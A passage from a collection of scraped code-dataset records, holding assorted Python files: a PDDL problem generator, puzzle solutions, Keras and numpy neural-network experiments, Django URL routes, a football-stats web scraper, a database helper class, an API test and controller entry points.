objects[2]\n # cookingtools = objects[3]\n # cleaningtools = objects[4]\n # gardeningtools = objects[5]\n # plants = objects[6]\n\n predicates = []\n vect = [x for sublist in objects for x in sublist]\n\n for i in vect:\n if isinstance(i, Locatable):\n predicates.append(\"(at {} Room{})\".format(str(i), str(i.at)))\n \n if isinstance(i, Dish):\n predicates.append(\"(ingr1 Ingredient{} {})\".format(i.ingrs[0], str(i)))\n predicates.append(\"(ingr2 Ingredient{} {})\".format(i.ingrs[1], str(i)))\n predicates.append(\"(ingr3 Ingredient{} {})\".format(i.ingrs[2], str(i)))\n predicates.append(\"(needed CookingTool{} {})\".format(i.neededcookingtool, str(i)))\n\n if isinstance(i, Room):\n predicates.append(\"(connected {} Room{})\".format(str(i), i.nextroom))\n if i.position:\n predicates.append(\"(position {})\".format(str(i)))\n \n predicates.append(\"(handfree)\")\n\n return predicates\n\ndef creategoals(objects, mode, task=[\"cook\"]):\n goals = []\n\n if \"cook\" in task:\n # Select a random assortment of dishes that must be cooked at the end\n dishes = objects[0]\n cookingtools = objects[3]\n mustclean = r.randint(0, 1) == 0\n\n mustcook = r.sample(dishes, r.randint(1, len(dishes)))\n\n for d in mustcook:\n goals.append(\"(cooked {})\".format(str(d)))\n \n if mustclean or mode == \"train\":\n for i in cookingtools:\n goals.append(\"(washed {})\".format(str(i)))\n \n if \"clean\" in task:\n # Select a random assortment of rooms that must be clean at the end\n rooms = objects[2]\n\n toclean = r.sample(rooms, r.randint(1, len(rooms)))\n\n for i in toclean:\n goals.append(\"(clean {})\".format(str(i)))\n\n if \"garden\" in task:\n #Select a random assortment of plants that must be gardened\n plants = objects[6]\n\n togarden = r.sample(plants, r.randint(1, len(plants)))\n\n for i in togarden:\n goals.append(\"(gardened {})\".format(str(i)))\n\n return goals\n\n\nnproblems = int(sys.argv[1])\nmode = sys.argv[2]\n\nfor p in range(nproblems):\n\n # ndishes = 2\n # nrooms = 4\n # nplants = 3\n # ncookingtools = 2\n # ncleaningtools = 1\n # ngardeningtools = 3\n\n if mode == \"train\":\n ndishes = r.randint(2,4)\n ningr = r.randint(ndishes * 3, ndishes * 4)\n nrooms = r.randint(3,5)\n nplants = r.randint(2,5)\n ncookingtools = r.randint(2,4)\n ncleaningtools = r.randint(1,3)\n ngardeningtools = r.randint(1,3)\n else:\n ndishes = r.randint(20, 30)\n ningr = r.randint(ndishes * 3, ndishes * 4)\n nrooms = r.randint(30, 50)\n nplants = r.randint(30, 50)\n ncookingtools = r.randint(10, 15)\n ncleaningtools = r.randint(10, 15)\n ngardeningtools = r.randint(10, 15)\n\n objects = createobjects(ndishes, ningr, nrooms, nplants, ncookingtools, ncleaningtools, ngardeningtools)\n predicates = createpredicates(objects)\n \n if mode == \"train\": ntasks = r.randint(2,3)\n else: ntasks = r.randint(1,2)\n\n tasks = [\"cook\", \"clean\", \"garden\"]\n \n goals = creategoals(objects, mode, r.choices(tasks, k=ntasks))\n\n with open(\"p{}.pddl\".format(p), \"w+\") as f:\n f.write(\"(define (problem multitasking{})\\n\\t(:domain multitasking)\\n\\t(:objects\\n\".format(str(p)))\n\n for typ in objects:\n f.write(\"\\t\\t\")\n for o in typ:\n f.write(str(o) + \" \")\n f.write(\" - {}\\n\".format(type(typ[0]).__name__.lower()))\n \n f.write(\")\\n\\t(:init\\n\")\n\n for p in predicates:\n f.write(\"\\t\\t{}\\n\".format(p))\n \n f.write(\"\\t)\\n\\t(:goal (and\\n\")\n\n for g in goals:\n f.write(\"\\t\\t{}\\n\".format(g))\n f.write(\"\\t))\\n)\")\n\n\n","sub_path":"generators/multitasking/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"139875791","text":"# 조이스틱으로 알파벳 이름을 완성하세요. 맨 처음엔 A로만 이루어져 있습니다.\n# ex) 완성해야 하는 이름이 세 글자면 AAA, 네 글자면 AAAA\n\n# 조이스틱을 각 방향으로 움직이면 아래와 같습니다.\n\n# ▲ - 다음 알파벳\n# ▼ - 이전 알파벳 (A에서 아래쪽으로 이동하면 Z로)\n# ◀ - 커서를 왼쪽으로 이동 (첫 번째 위치에서 왼쪽으로 이동하면 마지막 문자에 커서)\n# ▶ - 커서를 오른쪽으로 이동\n# 예를 들어 아래의 방법으로 \"JAZ\"를 만들 수 있습니다.\n\n# - 첫 번째 위치에서 조이스틱을 위로 9번 조작하여 J를 완성합니다.\n# - 조이스틱을 왼쪽으로 1번 조작하여 커서를 마지막 문자 위치로 이동시킵니다.\n# - 마지막 위치에서 조이스틱을 아래로 1번 조작하여 Z를 완성합니다.\n# 따라서 11번 이동시켜 \"JAZ\"를 만들 수 있고, 이때가 최소 이동입니다.\n# 만들고자 하는 이름 name이 매개변수로 주어질 때, 이름에 대해 조이스틱 조작 횟수의 최솟값을 return 하도록 solution 함수를 만드세요.\n\n# 제한 사항\n# name은 알파벳 대문자로만 이루어져 있습니다.\n# name의 길이는 1 이상 20 이하입니다.\n# 입출력 예\n# name\treturn\n# \"JEROEN\"\t56\n# \"JAN\" 23\n\n\n# 1. 일단 방향키를 구현한다.\n# ▲ - 다음 알파벳\n# ▼ - 이전 알파벳 (A에서 아래쪽으로 이동하면 Z로)\n# ◀ - 커서를 왼쪽으로 이동 (첫 번째 위치에서 왼쪽으로 이동하면 마지막 문자에 커서)\n# ▶ - 커서를 오른쪽으로 이동\n# 예를 들어 아래의 방법으로 \"JAZ\"를 만들 수 있습니다.\n\nname = 'JEROEN'\n\n\ndef solution(name):\n joy = []\n answer = 0\n #배정\n for i in range(len(name)):\n if name[i]=='A':\n continue\n else:\n joy.append(i)\n temp = ord(name[i])-ord('A')\n print(temp) # 8 4 17 14 4 13\n if temp>13: # 최선의 방법을 찾는것이기 때문에 26개의 문자중 1/2값인 13을 넘기게 되면 반대로 탐색\n answer += 26-temp\n # print(answer) # 22, 34 \n else:\n answer += temp\n # print(answer) # 9, 13 ,38, 51\n #이제 index 기반으로 다음 위치 그리디하게 찾기\n current = 0\n for i in range(len(joy)):\n move_list = [abs(x-current) if abs(x-current)<=len(name)/2 else len(name)-abs(x-current) for x in joy]\n print(move_list)\n answer += min(move_list)\n current = joy.pop(move_list.index(min(move_list)))\n return answer\n\nsolution(name)","sub_path":"프로그래머스/조이스틱.py","file_name":"조이스틱.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"138154982","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# Schooner - Course Management System\n# University of Turku / Faculty of Technilogy / Department of Computing\n# (c) 2021, Jani Tammi \n#\n# Submission.py - Data dictionary class for core.submission\n# 2021-08-27 Initial version.\n# 2021-09-03 Updated to more flexible version with .db_update().\n#\n\nclass Submission(dict):\n def __init__(self, cursor, submission_id: int = None):\n self.cursor = cursor\n # Primary key is whatever are the call parameters, minus the first two\n self.pkkeys = [k for k in locals().keys() if k not in ('self', 'cursor')]\n self.pkvals = locals() # to avoid KeyError while being used inside comprehensions\n self.pkvals = [self.pkvals[k] for k in self.pkkeys]\n SQL = f\"SELECT * FROM core.{self.__class__.__name__} WHERE \"\n if all(self.pkvals):\n SQL += \" AND \".join([f\"{pk}=%({pk})s\" for pk in self.pkkeys])\n else:\n SQL += \"false\"\n if cursor.execute(SQL, locals()).rowcount:\n self.update(\n dict(\n zip(\n [key[0] for key in cursor.description],\n cursor.fetchone()\n )\n )\n )\n elif all([v is None for v in self.pkvals]):\n # (all) PKs are None -> Create empty dict\n self.update(\n dict(\n zip(\n [key[0] for key in cursor.description],\n [None] * len(cursor.description)\n )\n )\n )\n else:\n raise ValueError(\n f\"{self.__class__.__name__} (\" +\n \", \".join(f\"'{v}'\" for v in self.pkvals) +\n \") not found!\"\n )\n\n\n def db_update(self, commit: bool = True) -> None:\n \"\"\"Update database table to match. (Will not INSERT).\"\"\"\n issues = []\n for k in self.pkkeys:\n if not self[k]:\n issues.append(k)\n if issues:\n raise ValueError(\n f\"Primary key value(s) ({', '.join(issues)}) have NULL values!\"\n )\n SQL = f\"UPDATE core.{self.__class__.__name__} SET \"\n SQL += \", \".join([f\"{k}=%({k})s\" for k in self.keys() if k not in self.pkkeys])\n SQL += \" WHERE \"\n SQL += \" AND \".join([f\"{pk}=%({pk})s\" for pk in self.pkkeys])\n if not self.cursor.execute(SQL, self).rowcount:\n raise Exception(\n f\"Unable to UPDATE {self.__class__.__name__} (\" +\n \", \".join(f\"'{self[k]}'\" for k in self.pkkeys) + \")!\"\n )\n if commit:\n self.cursor.connection.commit()\n\n\n\n# EOF\n","sub_path":"schooner/db/core/Submission.py","file_name":"Submission.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"466039942","text":"# A Bingo card consists of 5 columns of 5 numbers which are labelled with the letters B, I, N, G and O.\n\n# There are 15 numbers that can appear under each letter.\n\n# In particular, the numbers that can appear under the B range from 1 to 15,\n# the numbers that can appear under the I range from 16 to 30,\n# the numbers that can appear under the N range from 31 to 45, and so on.\n\n# Write a function that creates a random Bingo card and stores it in a dictionary.\n\n# The keys will be the letters B, I, N, G and O. The values will be the lists of five numbers that appear under each letter.\n# Write a second function that displays the Bingo card with the columns labelled appropriately.\n\n# Use these functions to write a program that displays a random Bingo card.\n\n# Ensure that the main program only runs when the file containing your solution has not been imported into another program.\n\nimport random\n\nbingo_card = {}\n\ndef generateCard(c):\n c[\"B\"] = random.sample(range(1, 15), 5)\n c[\"I\"] = random.sample(range(16, 30), 5)\n c[\"N\"] = random.sample(range(31, 45), 5)\n c[\"G\"] = random.sample(range(46, 60), 5)\n c[\"O\"] = random.sample(range(61, 75), 5)\n\n return c\n\nprint(generateCard(bingo_card))\n","sub_path":"M2/024-create-a-bingo-card/024-create-a-bingo-card.py","file_name":"024-create-a-bingo-card.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97782944","text":"#!/usr/bin/env python3\n\nfrom src.day9 import boost_program as boost\n\n'''\nThe springdroid will move forward automatically, constantly thinking about whether to jump. \nThe springscript program defines the logic for this decision.\n\nTwo registers are available: T, the temporary value register, and J, the jump register. \nIf the jump register is true at the end of the springscript program, the springdroid will try to jump. \nBoth of these registers start with the value false.\n\nthey have a sensor that can detect whether there is ground at various distances in the direction it is facing; \nthese values are provided in read-only registers\n\nour springdroid can detect ground at four distances: one tile away (A), two tiles away (B), \nthree tiles away (C), and four tiles away (D). If there is ground at the given distance, \nthe register will be true; if there is a hole, the register will be false.\n\nAND X Y sets Y to true if both X and Y are true; otherwise, it sets Y to false.\nOR X Y sets Y to true if at least one of X or Y is true; otherwise, it sets Y to false.\nNOT X Y sets Y to true if X is false; otherwise, it sets Y to false.\n\nFor example, the one-instruction program NOT A J means \"if the tile immediately in front of me is not ground, jump\".\n'''\n\n\ndef instructions_to_ascii(instructions):\n asciis = []\n for i in instructions:\n asciis.append(int(ord(str(i))))\n return asciis\n\n\ndef get_input(_):\n input = 'NOT C J\\n' \\\n 'NOT B T\\n' \\\n 'OR T J\\n' \\\n 'NOT A T\\n' \\\n 'OR T J\\n' \\\n 'AND D J\\n' \\\n 'WALK\\n'\n return instructions_to_ascii(input)\n\n\nif __name__ == '__main__':\n with open('input', 'r') as file:\n first_line = file.readlines()[0]\n input = list(map(int, first_line.split(\",\")))\n runner = boost.BoostProgram(input, [], get_input, False, True)\n output = runner.run()\n\n","sub_path":"src/day21/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"239680792","text":"from keras import models\nfrom keras import layers\nfrom keras import losses\nfrom keras import optimizers\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# <============PLOTING============>#\n\n\ndef ploting():\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n epochs = range(1, len(loss) + 1)\n fig = plt.figure()\n ax1 = fig.add_subplot(2, 1, 1)\n ax2 = fig.add_subplot(2, 1, 2)\n ax1.plot(epochs, loss, 'bo', label='Training loss')\n ax1.plot(epochs, val_loss, 'b', label='Validation loss', color='r')\n ax1.set_title('Training and validation loss')\n ax1.set_xlabel('Epochs')\n ax1.set_ylabel('Loss')\n ax1.legend()\n ax2.plot(epochs, acc, 'bo', label='Training acc')\n ax2.plot(epochs, val_acc, 'b', label='Validation acc', color='r')\n ax2.set_title('Training and validation accuracy')\n ax2.set_xlabel('Epochs')\n ax2.set_ylabel('Accuracy')\n ax2.legend()\n for ax in fig.axes:\n ax.grid(True)\n plt.show()\n\n\n# <============DATASET============>#\n\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\ntrain_images = train_images.reshape((60000, 28, 28, 1))\ntrain_images = train_images.astype('float32') / 255\ntest_images = test_images.reshape((10000, 28, 28, 1))\ntest_images = test_images.astype('float32') / 255\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\n\n\n# <============CREATE MODEL============>#\n\n\nmodel = models.Sequential()\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu',\n input_shape=(28, 28, 1)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(128, (3, 3), activation='relu'))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(64, activation='relu'))\nmodel.add(layers.Dense(10, activation='softmax'))\n\nprint(model.summary())\n\n\n# <============COMPILE MODEL============>#\n\n\n'''\n# test_acc: 0.9914000034332275\nmodel.compile(optimizer='rmsprop',\n loss='mse',\n metrics=['acc'],\n loss_weights=None,\n sample_weight_mode=None,\n weighted_metrics=None,\n target_tensors=None)\n'''\n\n# test_acc: 0.9886999726295471\nmodel.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['acc'],\n loss_weights=None,\n sample_weight_mode=None,\n weighted_metrics=None,\n target_tensors=None)\n\n\n''' <============SAME_RESULT============>\nmodel.compile(optimizer=optimizers.RMSprop(lr=0.001),\n loss='mse',\n metrics=['acc'])\n'''\n\n\n# <============TRAINING============>#\n\n\nhistory = model.fit(x=train_images,\n y=train_labels,\n batch_size=128,\n epochs=5,\n verbose=1,\n callbacks=None,\n validation_split=0.0,\n validation_data=(test_images, test_labels),\n shuffle=True,\n class_weight=None,\n sample_weight=None,\n initial_epoch=0,\n steps_per_epoch=None,\n validation_steps=None,\n validation_freq=1,\n max_queue_size=10,\n workers=1,\n use_multiprocessing=False)\n\n\n# <============RESULT FOR TEST DATA============>#\n\n\ntest_loss, test_acc = model.evaluate(x=test_images,\n y=test_labels,\n batch_size=None,\n verbose=1,\n sample_weight=None,\n steps=None,\n callbacks=None,\n max_queue_size=10,\n workers=1,\n use_multiprocessing=False)\n\n\n''' Prediction'''\n\nprint((model.predict(train_images[0:1, :, :, :])))\n\n\n# <============PRINT============>#\n\n\nprint(f'test_acc: {test_acc}\\ntest_loss: {test_loss}')\nploting()\n\n\n","sub_path":"beginner/Digits/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"279780327","text":"from neuron_network import NeuronNetwork, Optimalisation, Initialisation\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport gzip\nimport pickle\nimport time\nimport random\n\nf = gzip.open('mnist.pkl.gz', 'rb')\ntraining_data, validation_data, test_data = pickle.load(f, encoding=\"latin1\")\nf.close()\n\ntt, vt = training_data\nprint(np.shape(tt))\n# tt = tt[:1000, :]\n# vt = vt[:1000]\n\ntv, vv = validation_data\nprint(np.shape(tv))\n# tv = tv[:100, :]\n# vv = vv[:100]\n# print(np.shape(t), np.shape(v))\n\n# print(training_data)\n# print(np.shape(validation_data))\n# print(np.shape(test_data))\n\nlayers_sig = [\n (6272, 128),\n # (60, 30),\n (128, 10)\n\n]\n\n\nlayers_relu = [\n (6272, 128),\n # (40, 20),\n (128, 10)\n]\n\ndef relu(x):\n return np.maximum(x, 0)\n\ndef relu_derivative(x):\n return 1. * (x > 0)\n\n\ndef sigmoid(x):\n return 1.0/(1.0+np.exp(-x))\n\n\ndef sigmoid_prime(x):\n return sigmoid(x)*(1-sigmoid(x))\n\nrelu_activation_function = {\n lambda x: relu(x),\n lambda x: relu_derivative(x)\n}\n\nsigmoid_activation_function = (\n lambda x: sigmoid(x),\n lambda x: sigmoid_prime(x)\n)\n\nnet_relu = NeuronNetwork(\n layers_relu,\n 0.01,\n relu_activation_function,\n momentum=0.1,\n adadelta_y=0.9,\n negative=True,\n soft_max_output=True,\n optimalisation=Optimalisation.MOMENTUM,\n initialisation=Initialisation.RANDOM\n)\n\nnet_sigmoid = NeuronNetwork(\n layers_sig,\n 0.1,\n sigmoid_activation_function,\n momentum=0.1,\n adadelta_y=0.9,\n negative=True,\n soft_max_output=True,\n optimalisation=Optimalisation.MOMENTUM,\n initialisation=Initialisation.RANDOM\n)\n\n# def singular_run():\n#\n# print(np.shape(tt), np.shape(vt))\n#\n# start = time.time()\n# nn.train(tt, vt, 3, 200, 0.05)\n# print(round((time.time()-start)*100)/100, \"s\")\n#\n# start = time.time()\n# nn.test(tv, vv)\n# print(round((time.time()-start)*100)/100, \"s\")\n#\n# index = random.randint(0, len(tv))\n# print(\"Przewidywania dla: \", nn.predict(tv[index]))\n#\n# plt.imshow(np.resize(tv[index], (28, 28)))\n# plt.show()\n# singular_run()\n\ndef plot_run():\n data_for_plot = []\n data_for_plot2 = []\n for i in range(0, 1):\n print(\"Epoka: \", i)\n net_relu.train(tt, vt, 1, 100, 0.01)\n data_for_plot.append(net_relu.test(tv, vv))\n # net_sigmoid.train(tt, vt, 1, 100, 0.1)\n # data_for_plot2.append(net_sigmoid.test(tv, vv))\n plt.plot(data_for_plot, 'b', marker='o', label='Relu')\n plt.plot(data_for_plot2, 'r', marker='o', label='Sigmoid')\n plt.legend(loc='lower right')\n plt.suptitle('Wykres procentowego stanu wyuczenia modelu w danej epoce')\n plt.xlabel(\"Numer epoki\")\n plt.ylabel(\"Procent wyuczenia modelu\")\n # plt.xticks(np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9]), [1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n plt.yticks(np.array([0, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100]),\n ['0%', '10%', '20%', '30%', '40%', '50%', '60%', '70%', '80%', '90%', '100%'])\n plt.savefig('wykres1')\n plt.show()\n\nplot_run()\n\n# print(np.array([1,4,1,2,5,6])*np.array([2,1,4,6])[:, np.newaxis])\n#\n#\n# inp = np.array([\n# [1, 0, 0],\n# [0, 1, 1],\n# ])\n#\n# neur = np.array([\n# [10, 2, 2, 2],\n# [10, 3, 3, 3]\n# ])\n#\n\n# print(np.tile(inp[0], (neur.shape[0], 1)))\n# print(neur[:, 0])\n# print(np.sum(np.tile(inp[0], (neur.shape[0], 1))*neur[:, 1:], axis=1)+neur[:, 0])\n# print(np.sum(inp[0]*neur[:, 1:], axis=1)+neur[:, 0])\n\n# delta = np.array([\n# 1,2,3,4,5\n# ])\n#\n# prime = np.array([\n# 0,0,1,0,0,1,0\n# ])\n#\n# layers = np.array([\n# [1, 0, 0, 0, 0],\n# [1, 1, 0, 0, 0],\n# [1, 0, 1, 0, 0],\n# [1, 0, 0, 1, 0],\n# [1, 0, 0, 0, 1],\n# [1, 0, 0, 1, 0],\n# [1, 0, 1, 0, 0],\n# ])\n\n\n#\n# print(\n# np.array([\n# [1,1,2,3,5,2,3,5,2],\n# [1,3,2,3,4,6,2,1,2],\n# [2,4,2,5,6,2,6,7,2]\n# ]).T *\n# np.array([1,0,1])\n# )\n#\n#\n# print(\n# np.sum(\n# np.array([\n# [1,1,2,3,5,2,3,5,2],\n# [1,3,2,3,4,6,2,1,2],\n# [2,4,2,5,6,2,6,7,2]\n# ]).T *\n# np.array([1,0,1]), axis=1)\n# )\n\n# print(layers*prime[:, np.newaxis])\n# print(layers*delta)\n#\n# print(np.array([1,0,0,0])*np.array([2,2,2,2]))\n#\n# print(np.shape(layers), np.shape(delta))\n# print(np.sum(layers*delta, axis=1))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"316119956","text":"from django.conf.urls import include, url\nfrom django.contrib.auth.views import login\n\nfrom life.views import main\n\nurlpatterns = [\n # Main views\n url(r'^$', main),\n url(r'^budget/', include('budget.urls')),\n url(r'^health/', include('health.urls')),\n url(r'^food/', include('food.urls')),\n url(r'^scenarios/', include('scenarios.urls')),\n\n # Autocomplete stuff\n #url(r'^autocomplete/', include('autocomplete_light.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n\n # Login stuff\n url(r'^accounts/login/$',\n login,\n {'template_name': 'login.html'},\n name='login'),\n]\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n","sub_path":"life/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"322952812","text":"\"\"\"Module for Krake controller responsible for binding Krake\napplications to specific backends and entry point of Krake scheduler.\n\n.. code:: bash\n\n python -m krake.controller.scheduler --help\n\nConfiguration is loaded from the ``controllers.scheduler`` section:\n\n.. code:: yaml\n\n controllers:\n scheduler:\n api_endpoint: http://localhost:8080\n worker_count: 5\n\n\"\"\"\nimport logging\nimport pprint\nfrom argparse import ArgumentParser\n\nfrom krake import load_config, setup_logging, search_config\nfrom ...controller import create_ssl_context, run\nfrom .scheduler import Scheduler\n\nlogger = logging.getLogger(\"krake.controller.scheduler\")\n\n\ndef main(config):\n scheduler_config = load_config(config or search_config(\"scheduler.yaml\"))\n\n setup_logging(scheduler_config[\"log\"])\n logger.debug(\n \"Krake configuration settings:\\n %s\" % pprint.pformat(scheduler_config)\n )\n\n tls_config = scheduler_config.get(\"tls\")\n ssl_context = create_ssl_context(tls_config)\n logger.debug(\"TLS is %s\", \"enabled\" if ssl_context else \"disabled\")\n\n scheduler = Scheduler(\n api_endpoint=scheduler_config[\"api_endpoint\"],\n worker_count=scheduler_config[\"worker_count\"],\n ssl_context=ssl_context,\n debounce=scheduler_config.get(\"debounce\", 0),\n reschedule_after=scheduler_config.get(\"reschedule_after\", 60),\n stickiness=scheduler_config.get(\"stickiness\", 0.1),\n )\n run(scheduler)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(description=\"Krake scheduler\")\n parser.add_argument(\"-c\", \"--config\", help=\"Path to configuration YAML file\")\n main(**vars(parser.parse_args()))\n","sub_path":"krake/krake/controller/scheduler/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"401349808","text":"\nfrom django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"posts\", views.posts, name=\"posts\"),\n\n\n # API Routes\n path(\"like\", views.like, name=\"like\"),\n path(\"editing_post\", views.editing_post, name=\"editing_post\"),\n path(\"edit_post\", views.edit_post, name=\"edit_post\"),\n path(\"new_post\", views.new_post, name=\"new_post\"),\n path(\"follow\", views.follow_button, name=\"follow_button\"),\n path(\"profile/\", views.profile, name=\"profile\"),\n path(\"follow/\", views.follow, name=\"follow\")\n]\n","sub_path":"network/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"289139737","text":"import json\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.request import urlopen\r\n\r\nscrape_url = 'https://understat.com/league/EPL'\r\n\r\n\r\npg_connect = urlopen(scrape_url)\r\n\r\npg_html = BeautifulSoup(pg_connect, \"html.parser\")\r\n\r\njson_raw_string = pg_html.find_all(name = \"script\")[3].string\r\nprint(json_raw_string)\r\n\r\nstart_ind = json_raw_string.index(\"\\\\\") \r\nend_ind = json_raw_string.index(\"')\")\r\n\r\njson_data = json_raw_string[start_ind:end_ind]\r\n\r\njson_data = json_data.encode(\"utf8\").decode(\"unicode_escape\")\r\n\r\njson.loads(json_data)\r\n\r\nfin_json_df = pd.json_normalize(json.loads(json_data))\r\n\r\nprint(fin_json_df)\r\n\r\nfin_json_df.to_csv('PLPLAYERS.csv')\r\n\r\n\r\n","sub_path":"plwebsc.py","file_name":"plwebsc.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"282997660","text":"from opendc.util.database import DB\n\ntest_id = 24 * '1'\n\n\ndef test_add_project_missing_parameter(client):\n assert '400' in client.post('/v2/projects').status\n\n\ndef test_add_project(client, mocker):\n mocker.patch.object(DB, 'fetch_one', return_value={'_id': test_id, 'authorizations': []})\n mocker.patch.object(DB,\n 'insert',\n return_value={\n '_id': test_id,\n 'datetimeCreated': '000',\n 'datetimeLastEdited': '000',\n 'topologyIds': []\n })\n mocker.patch.object(DB, 'update', return_value={})\n res = client.post('/v2/projects', json={'project': {'name': 'test project'}})\n assert 'datetimeCreated' in res.json['content']\n assert 'datetimeLastEdited' in res.json['content']\n assert 'topologyIds' in res.json['content']\n assert '200' in res.status\n","sub_path":"api/opendc/api/v2/projects/test_endpoint.py","file_name":"test_endpoint.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"588638675","text":"from xlslib import XLS\nfrom unidecode import unidecode\nimport re\nimport datetime\nfrom progress_bar import printProgress\nimport math\n\n\ndef replace_wrong(old_string, new_string, array, is_regex):\n if not is_regex:\n for position in range(len(array)):\n if array[position] != None:\n array[position] = str(array[position]).replace(old_string, new_string)\n else:\n array[position] = \"BRAK-DANYCH\"\n else:\n for position in range(len(array)):\n if array[position] != None:\n if re.search((old_string + \"$\"), array[position]):\n array[position] = str(array[position]).replace(old_string, new_string)\n else:\n array[position] = \"BRAK-DANYCH\"\n return array\n\n\ndef delete_non_ascii_letters(files_array, column_name):\n\n iteration = 0\n total = len(files_array)\n printProgress(iteration, total, prefix = 'Progress: ', suffix = 'Complete', barLength = 50)\n\n # if arrays with old and new strings have same length...\n if len(old_string_array) == len(new_string_array):\n # for each .xlsx file\n for excel_file in files_array:\n\n # load file.\n filename = 'xls/' + excel_file + '.xlsx'\n file = XLS(filename)\n\n # get array with strings (worker positions)\n arr = file.get_column(column_name)\n\n # remove all czech letters\n for k, v in czech_letters_dict.items():\n arr = replace_wrong(k, v, arr, 0)\n\n for x in range(len(arr)):\n arr[x] = unidecode(arr[x])\n \n for n in range(len(old_string_array)):\n arr = replace_wrong(old_string_array[n], new_string_array[n], arr, 0)\n\n if column_name == \"F\" or column_name == \"H\":\n for position in arr:\n if position != \"BRAK-DANYCH\":\n math.fabs(float(position))\n\n if column_name == \"B\":\n for i in range(len(arr)):\n position = arr[i]\n year, month = position[:len(position) // 2], position[len(position) // 2:]\n new_date = month + \".20\" + year\n arr[i] = new_date\n\n arr = replace_wrong(\"..\",\".\", arr, 0)\n file.write_column(column_name, arr)\n file.save(filename)\n\n iteration += 1\n printProgress(iteration, total, prefix = \"Progress: \", suffix = \"Complete\", barLength = 50)\n else:\n print(\"There is something wrong with arrays\")\n\n\n\nczech_letters_dict = { \"ť\":\"L\", \"ú\":\"O\", \"í\":\"Z\", \"É\":\"E\" }\n\n\nold_string_array = [ \" \", \",\" ]\n\nnew_string_array = [ \"\", \".\" ]\n\nfiles_array = [\"Wynagrodzenia2007\"]\n\nregex_dict = { }\n\n\nprint(\"\")\nprint(\"### Running run_wynagrodzenia.py script - Absolute values on columns F and H, repairing column's B dates ###\")\nprint(\"\")\n\nprint(\"Repairing bad dates in Wynagrodzenia.xls in column B\")\ndelete_non_ascii_letters(files_array, \"B\")\n\nprint(\"Absolute values in Wynagrodzenia.xls on column F\")\ndelete_non_ascii_letters(files_array, \"F\")\n\nprint(\"Absolute values in Wynagrodzenia.xls on column H\")\ndelete_non_ascii_letters(files_array, \"H\")\n\n","sub_path":"lib/run_wynagrodzenia.py","file_name":"run_wynagrodzenia.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"609562612","text":"#!/usr/bin/env python\n\nimport logging\nimport time\n\nfrom switcher.agistopology.ddm import AGISDDM, AGISDDMHandler\nfrom switcher.services.serverapi import AGIS\nfrom switcher.downtime import EndpointDowntimes, OverlapDowntimes, OverlapDowntimesList\n\n\nclass DDM(AGISDDM):\n\n def __init__(self, endpoint):\n super(DDM, self).__init__(endpoint)\n self.log = logging.getLogger('topology')\n ###self.downtime_l = []\n self.endpointdowntimes = EndpointDowntimes()\n self.log.debug('Object DDMSwitcher created.')\n\n\n def add_downtime(self, downtime):\n self.endpointdowntimes.add(downtime)\n\n\n def 